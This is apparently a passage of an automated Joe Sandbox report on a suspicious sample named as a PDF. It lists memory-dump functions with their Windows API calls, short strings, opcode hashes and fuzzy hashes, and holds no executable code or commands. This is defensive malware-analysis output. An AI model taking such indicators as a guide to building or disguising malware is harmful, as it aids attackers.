Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: 436ba621d741991cc7c294c96e03955e21a486c950235d19c73dc0a096436f6d
Instruction ID: b298e322c83fb8456ef5fa674874c34587dc5c8d1cbcc1708e467763c5bb64cc
Opcode Fuzzy Hash: 436ba621d741991cc7c294c96e03955e21a486c950235d19c73dc0a096436f6d
Instruction Fuzzy Hash: 4D81B230A00625CFCB24DF6DC488A69BBF6FF99209F1485A9D925D7365DB31EC41CB60

Function 01D29C30 Relevance: 2.6, Strings: 2, Instructions: 148COMMON

Download Yara Rule

Strings

4'^q, xrefs: 01D29D6D
4'^q, xrefs: 01D29D84

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 8ffb57583a9b5011cc373ae367c15b0b42b53603a6442a4279683b0e50808fa0
Instruction ID: 45443fa144821bc709b171af8d83658b15d20064881ec530dacc00f6e87d244d
Opcode Fuzzy Hash: 8ffb57583a9b5011cc373ae367c15b0b42b53603a6442a4279683b0e50808fa0
Instruction Fuzzy Hash: AD51B1307002259FDB09CF6DC854BAABBEAEF98318F148466E918CB355DB75CC02DB61

Function 01D23CC0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xbq, xrefs: 01D23CCD
Xbq, xrefs: 01D23CF6

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: Xbq$Xbq
API String ID: 0-1243427068
Opcode ID: 1e43443ad3f92c28e0ed37ca07830610334ff24022da9fbf37226e0c0b51ab9a
Instruction ID: c65d7cf72ac27e824720241837c9ce9b660046fdff6e8b7dd3300d372530ab4c
Opcode Fuzzy Hash: 1e43443ad3f92c28e0ed37ca07830610334ff24022da9fbf37226e0c0b51ab9a
Instruction Fuzzy Hash: B931E631704334A7DF1C466E859427EAAEABBDC308F14443AE926D3395DBBDCC458791

Function 01D20C8F Relevance: 1.8, Strings: 1, Instructions: 546COMMON

Download Yara Rule

Strings

LR^q, xrefs: 01D20F19

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 2e92ba201ad6450e2f3878d61a9ee8c3314751fa584f95e0c654e2f20fe365d2
Instruction ID: 176d4d462c42c040cf77cdafbcc4ade4e1d88a87a43414d11c36ee7c3daca705
Opcode Fuzzy Hash: 2e92ba201ad6450e2f3878d61a9ee8c3314751fa584f95e0c654e2f20fe365d2
Instruction Fuzzy Hash: B052CC74E00219CFCB54DF68E994A9DBBB2FF48301F1095A9D809A7364EB746E85CF81

Function 01D20CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LR^q, xrefs: 01D20F19

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 1f24f0cd53c1855ed6b40fe65ea12733927bf232cd7ac798f5bce6c5a5c4e986
Instruction ID: 45b8da8b26ee56c098b8612455dba4c172528469c2d5a86a317b8093ca5dfe69
Opcode Fuzzy Hash: 1f24f0cd53c1855ed6b40fe65ea12733927bf232cd7ac798f5bce6c5a5c4e986
Instruction Fuzzy Hash: B352CC74E00219CFCB54DF68E994A9DBBB2FB48301F1095A9D809E7364EB746E85CF81

Function 07610E88 Relevance: 1.7, APIs: 1, Instructions: 168COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000014,?,?,046642A8,0376EA38,?,00000000), ref: 07610FE6

Memory Dump Source

Source File: 00000003.00000002.4181157256.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7610000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 18c25f175e15c2c8e87377c47fa9c48df7643616fa3911c8c6b0dbcdfa27e130
Instruction ID: ba86ba21eeefeb122c87d880ff6b918f13105b7cc18be967893bb61313213f9e
Opcode Fuzzy Hash: 18c25f175e15c2c8e87377c47fa9c48df7643616fa3911c8c6b0dbcdfa27e130
Instruction Fuzzy Hash: 68718F74A01249EFDB14DFA9D888D9EBBB6FF49610F154099F902AB361DB31E881CB50

Function 076128A8 Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000003,00000000,00000000,?,?,?,00000000), ref: 07612926

Memory Dump Source

Source File: 00000003.00000002.4181157256.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7610000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 383be21155bda321db3d5d971a32f30fd0672986721acae628e02d475eb40fb1
Instruction ID: eeee776efa8bb9f799942d466fcee7f6ae1bc7bde0913f40975ab340e62058b5
Opcode Fuzzy Hash: 383be21155bda321db3d5d971a32f30fd0672986721acae628e02d475eb40fb1
Instruction Fuzzy Hash: 2F21FFB2B001119FEB14DB69D815BAEB7A6FFC8314F088178E50A97394DB34EC25CB94

Function 05B68F79 Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 05B6900A

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 9478199f4cc7653de450eba10cc8c21cc6a2c0136a0c2b666cc0e0c055d10577
Instruction ID: 4585ed487a2bc04e52e1746b066587ab3a91638241325770617cc46d9e1718dd
Opcode Fuzzy Hash: 9478199f4cc7653de450eba10cc8c21cc6a2c0136a0c2b666cc0e0c055d10577
Instruction Fuzzy Hash: 923157B590024A8FCB11DFA9D544ADEFBF0FF48314F14859AD459AB351C734A988CFA1

Function 05B67390 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05B6741F

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 18381a7e8d706b72cd54c48941cfd4a9cf60ba2dfbf5d4ce54bcf39866bece34
Instruction ID: bf13b20c6ade5f6c238dcf4cd20ce784a7641d5c265c884bc9712479e67b01c0
Opcode Fuzzy Hash: 18381a7e8d706b72cd54c48941cfd4a9cf60ba2dfbf5d4ce54bcf39866bece34
Instruction Fuzzy Hash: 392114B59002189FDB10CFAAD584ADEFFF8FB48324F14801AE958A7310D378A944CFA5

Function 05B67398 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05B6741F

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d9ca266f88ea90240983cec383b83fc80bf5d4fd5762fff5168219755e137b55
Instruction ID: 674178322b5361d8affda6f3b39f76091f65d8c23faa580c7a3c84c7cae9eb82
Opcode Fuzzy Hash: d9ca266f88ea90240983cec383b83fc80bf5d4fd5762fff5168219755e137b55
Instruction Fuzzy Hash: FE21F5B59002599FDB10CFAAD584ADEFFF8FB48324F14801AE918A7310D378A954CFA4

Function 05B69070 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 05B690E9

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: c008f86e96c770a4bd60400947875323f87145f6a91413edca7e45977fa2b39c
Instruction ID: fdae4a6042cd513e0c7a9b3828d8657376cd2a02e5d77fae9cbe01c73d08d8cc
Opcode Fuzzy Hash: c008f86e96c770a4bd60400947875323f87145f6a91413edca7e45977fa2b39c
Instruction Fuzzy Hash: 622135B1D0025A8FDB14CFAAC844BEEFBF4FB88310F14846AE458A7250D778A945CF65

Function 05B69078 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 05B690E9

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: a59f50c9bc8b065320525ff2c4676eb83cea4d20710cf5f0a92506f9c530af89
Instruction ID: 9392082e0b2c9c5f4f7c2b1673bd238e8663b749a510ebb53b345848c8f5b3d6
Opcode Fuzzy Hash: a59f50c9bc8b065320525ff2c4676eb83cea4d20710cf5f0a92506f9c530af89
Instruction Fuzzy Hash: 1B2108B19002198FDB14CF9AC844BEEFBF9FB88324F14842AE459A7250D778A945CF65

Function 05B69400 Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,00000000,00000000,?), ref: 05B69485

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: 87313919053ea9962bf8301be06cd913553f1c10e9984a51b9d585cd71dc46dc
Instruction ID: 4518581eb51efb934d132e62dcb7e690092cf85aa5ed02d651f961004623ac69
Opcode Fuzzy Hash: 87313919053ea9962bf8301be06cd913553f1c10e9984a51b9d585cd71dc46dc
Instruction Fuzzy Hash: DF210FB6D00319DFCB20CF9AD984ADEFBB5FB48310F14846AE859A7600D379A544CBA0

Function 05B69408 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,00000000,00000000,?), ref: 05B69485

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: 92f80c0e169d758884f99558551efb7613ea4d1cfaed00eec79954d986478ef9
Instruction ID: ad08b547f2cf27d0413f357de9d0a50820c182e3accd5f13695812a5ad6cbd19
Opcode Fuzzy Hash: 92f80c0e169d758884f99558551efb7613ea4d1cfaed00eec79954d986478ef9
Instruction Fuzzy Hash: 4B2113B69003599FCB20CF9AD884ADEFBF5FB48310F10846EE819A7200C375A544CFA4

Function 08A53C80 Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 08A53CE5

Memory Dump Source

Source File: 00000003.00000002.4182149276.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8a50000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 907b021ed3113d3909a0addfab936845d27f05a6c7cb7ffe94ba8306479fdd59
Instruction ID: 6c747dcf5d8a7ae437fc6cb159b9c1540b15d2ecf08b4306a1c33e96e7f7539d
Opcode Fuzzy Hash: 907b021ed3113d3909a0addfab936845d27f05a6c7cb7ffe94ba8306479fdd59
Instruction Fuzzy Hash: 6D1146B58002499FDB10CF9AC485BDEFBF8EB48324F10841AE954A3600D378A588CFA5

Function 05B69818 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 05B6987D

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 32c6454af4e75ce459abb77ee6b38ac189e8a50bbe765b812c4582e3b3889c99
Instruction ID: 32dc091c75c4b92b86e41ac7ff50f41c003bba8b93c4219c25ce7838cbebf6e4
Opcode Fuzzy Hash: 32c6454af4e75ce459abb77ee6b38ac189e8a50bbe765b812c4582e3b3889c99
Instruction Fuzzy Hash: 861125B58003499FCB10DF9AD485BDEBFF8FB48320F10845AE558A7210D375A984CFA1

Function 08A53C88 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 08A53CE5

Memory Dump Source

Source File: 00000003.00000002.4182149276.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8a50000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: aab3788e2054498b66ca333ef64b41c78612297503f595ff9ff0426ad3653529
Instruction ID: 3736db24f75fb8bae49f713bf9877c44c1222b4b8922a8f148f2f79fd86d3d69
Opcode Fuzzy Hash: aab3788e2054498b66ca333ef64b41c78612297503f595ff9ff0426ad3653529
Instruction Fuzzy Hash: 7A1136B1800349CFDB10CF9AC945BDEFBF8EB48324F108419E954A3650D378A584CFA5

Function 05B681C0 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 05B6821D

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 2b6bba26bd92aa19be129ce4d515e47352b347392a34d73855ce46376040772c
Instruction ID: fe2e5e85a6b45de2357e259f6ba13fe86de54c0bfbd2231716ab23faf1a2cf25
Opcode Fuzzy Hash: 2b6bba26bd92aa19be129ce4d515e47352b347392a34d73855ce46376040772c
Instruction Fuzzy Hash: 141133B59006488FCB20DF9AD448BCEBBF8EB48324F248459E558A7210D378A544CFA5

Function 05B67B34 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 05B6821D

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 86937942358eb0ba12670ea476673bdc4cae3e164570a8674536958ecae55b43
Instruction ID: 8ef1f2f9b05bd32f51aab3e97b2dc9b0eed9fb81f889b21fa20f43e6b992ae75
Opcode Fuzzy Hash: 86937942358eb0ba12670ea476673bdc4cae3e164570a8674536958ecae55b43
Instruction Fuzzy Hash: BD1100B19006488FCB20DF9AD588BDEBBF8EB48324F248459E559A7210D378A944CFA5

Function 05B69820 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 05B6987D

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5eabb4d5e9f38470b99071e26349ffeaa404bcc1d8134084150cddf968e93b7f
Instruction ID: 5f2507c231e1891675c1371ad72d9cf1c39979a36c27db5887837a382a8171c2
Opcode Fuzzy Hash: 5eabb4d5e9f38470b99071e26349ffeaa404bcc1d8134084150cddf968e93b7f
Instruction Fuzzy Hash: 251103B58003499FDB10DF9AC444BDEBBF8FB48320F10845AE958A7210C375A944CFA5

Function 01D2AEF0 Relevance: 1.4, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

(o^q, xrefs: 01D2B079

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: (o^q
API String ID: 0-74704288
Opcode ID: be904c60c863cf4f9fd445aeab2059bceae8d95afd8f46369e49883b62646083
Instruction ID: d327c57dac73237e0b1823084fe6897f71e12f53881e0ce26574404b35064c55
Opcode Fuzzy Hash: be904c60c863cf4f9fd445aeab2059bceae8d95afd8f46369e49883b62646083
Instruction Fuzzy Hash: F541E232B002148FCB169F68D854AAEBBF6FFDD310F18446AE916D7391DE359C068790

Function 01D2E007 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d984391c9cd189caadf33b4980e7e13f62f7cbe0186ee68d704ac5ee53eaafe
Instruction ID: c0129a1b6b1788c8bbc48cc2213218821f3ef57fce5eedcd091074b53cda849c
Opcode Fuzzy Hash: 9d984391c9cd189caadf33b4980e7e13f62f7cbe0186ee68d704ac5ee53eaafe
Instruction Fuzzy Hash: 5A129935CA17438FE3512B20E6AC2AA7A68FF5F363744AE11E10FC0855DB7914A98F61

Function 01D2E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e83b07db0a357284507461b6fb533757aaa3b9ef599d454a26546675c145876
Instruction ID: 41df4b1d7033b07e584cafad41e101c55c40340d5817abe54fdc6776af8d105a
Opcode Fuzzy Hash: 5e83b07db0a357284507461b6fb533757aaa3b9ef599d454a26546675c145876
Instruction Fuzzy Hash: 26129935CA17438FE3512B20E6AC2AA7A68FF1F3637446E11E10FC0855DB7914A98F61

Function 01D29A10 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c504d2c0de65a67a20d668476e76b5b6daa1861684eda4794c03d4769bae000d
Instruction ID: b842f7014618c1406f8af223ee48fb8822ee08209b9ce6e076da6293e7ce8b4e
Opcode Fuzzy Hash: c504d2c0de65a67a20d668476e76b5b6daa1861684eda4794c03d4769bae000d
Instruction Fuzzy Hash: 599124319006258FCB15CF2CC8D45AABFF5EF95328F55C666D96897352D331E812CBA0

Function 01D280D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afa05c37469565d9ac7c11be73c97014f5596d198f9f2a28db9ff14e1af71442
Instruction ID: a52c19f022ed9466aeeb7b7377a492102a5950bcec7e58fbb0f88036ebe7a4b4
Opcode Fuzzy Hash: afa05c37469565d9ac7c11be73c97014f5596d198f9f2a28db9ff14e1af71442
Instruction Fuzzy Hash: C2718C347006258FDB15CF2CC884A6E7BE5BF6A608F1900A9E925DB3B1DB75DC41DB50

Function 01D2F71F Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 167affc971e440eaf1b1c39aaeaa900f573d809a1c9760588888d157b8a7b5ab
Instruction ID: 118722f866925ebee958f18efe498dbfd3ca71b6492c292a4a57421de0f86a22
Opcode Fuzzy Hash: 167affc971e440eaf1b1c39aaeaa900f573d809a1c9760588888d157b8a7b5ab
Instruction Fuzzy Hash: 4161E174E01219DFDB15CFA5D984BAEBBB2FF88304F208529D809AB354DB759986CF40

Function 01D2D548 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71a65b9b3377dec9f2daa50bf6801ffdaea1cd08009b47bf33fce382b2483c46
Instruction ID: 91499b2508a6dc0a9daf7590482f20efc4bbb89e3df1819d9e6a0a2e8d5b8519
Opcode Fuzzy Hash: 71a65b9b3377dec9f2daa50bf6801ffdaea1cd08009b47bf33fce382b2483c46
Instruction Fuzzy Hash: 73519274E01218DFDB54DFA9D98499DBBF2FF89300F249169E819AB364DB31A901CF50

Function 01D241A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1cc8e57772547a544364e99b7ab628bdd02f750848585f028b4e284ff45b18a
Instruction ID: 4ba23512db1bb4e4ef3b138859589620d839a97702ecce7e833e6757e44f7efe
Opcode Fuzzy Hash: b1cc8e57772547a544364e99b7ab628bdd02f750848585f028b4e284ff45b18a
Instruction Fuzzy Hash: 7C51BF74E01218CFCB08DFA9D59489DBBF2FF89304B209169E819AB324DB35AD42CF51

Function 01D2A303 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ff2d1f3787f2f1bc37b795ce1aa580d6bfcdcc4872305a5b49fa74d5a9ef220
Instruction ID: 23fb8e2ab15f3fc5800914a84f9c5c2b8a910314a564b09fb098ce5d252b0e30
Opcode Fuzzy Hash: 4ff2d1f3787f2f1bc37b795ce1aa580d6bfcdcc4872305a5b49fa74d5a9ef220
Instruction Fuzzy Hash: BA41E131A00269DFCF12CFA8C844A9DBFF2FF99318F048455E9699B692D374E915CB60

Function 01D25658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 831cf171e7f13b42394a5fe5622a08ce32404941e8213eb65aca3e9cce35a5c3
Instruction ID: 5d56aa41201f902aabd5bde3825ac3885285b79067d734e2465892e4bba61309
Opcode Fuzzy Hash: 831cf171e7f13b42394a5fe5622a08ce32404941e8213eb65aca3e9cce35a5c3
Instruction Fuzzy Hash: D4319231700219DFCF029F69E854AAF7BA6FB98309F048424F925CB244DB39DE21DB91

Function 01D22790 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36f336542e22dd4869b75c709443269b2d71776d4ecd494e4149d9f253b620a9
Instruction ID: 6969e34614446f834317fae59e4baafa792783cf8de919523030179458ff0df7
Opcode Fuzzy Hash: 36f336542e22dd4869b75c709443269b2d71776d4ecd494e4149d9f253b620a9
Instruction Fuzzy Hash: 7A316574D092498FCB01DFB8D8445EEBFF8FF5A304F0041AAE854A7260EB745A85CBA1

Function 01D28380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 238bc9e670c1a90c84d069fbc8191c12314c88c71bc19229b8824e65fdf9179d
Instruction ID: 40f4b0e03be9464687c7f38fdf3f79e2af4e8b753991deb6d994dbe9f9d465d8
Opcode Fuzzy Hash: 238bc9e670c1a90c84d069fbc8191c12314c88c71bc19229b8824e65fdf9179d
Instruction Fuzzy Hash: B121DE317042204BEB1A1A29C454A3E27DBAFD874CF14803DD426CB399EA7ACC43E382

Function 01D262F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ce26e4782af0a240a9d137570945ebd3e0318561e494da1ccacf8fd83839634
Instruction ID: 03e1c4dc7a498346641481e9272dfa644cb43fa5727fdc16250262a08f7ba070
Opcode Fuzzy Hash: 8ce26e4782af0a240a9d137570945ebd3e0318561e494da1ccacf8fd83839634
Instruction Fuzzy Hash: 54210135701B218FD7269A29D4A492EB7A6FFD975830C8469EC26CB394CF34DC02CB80

Function 01D228F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2520b69463d35454499208aff53ffd94c255d9540ff3bd419b7e6e177ae03e8a
Instruction ID: 526b253cec0b41e81de9bde58f8330f1a976dcc8382474d9d6ef9b77f2bfd8f1
Opcode Fuzzy Hash: 2520b69463d35454499208aff53ffd94c255d9540ff3bd419b7e6e177ae03e8a
Instruction Fuzzy Hash: 5321C471B001159FCB14DF38C4509AE37A5EBAD7A8B10C059E85A9B340DB34EE43CBD2

Function 018AD118 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4131110888.00000000018AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018AD000, based on PE: false

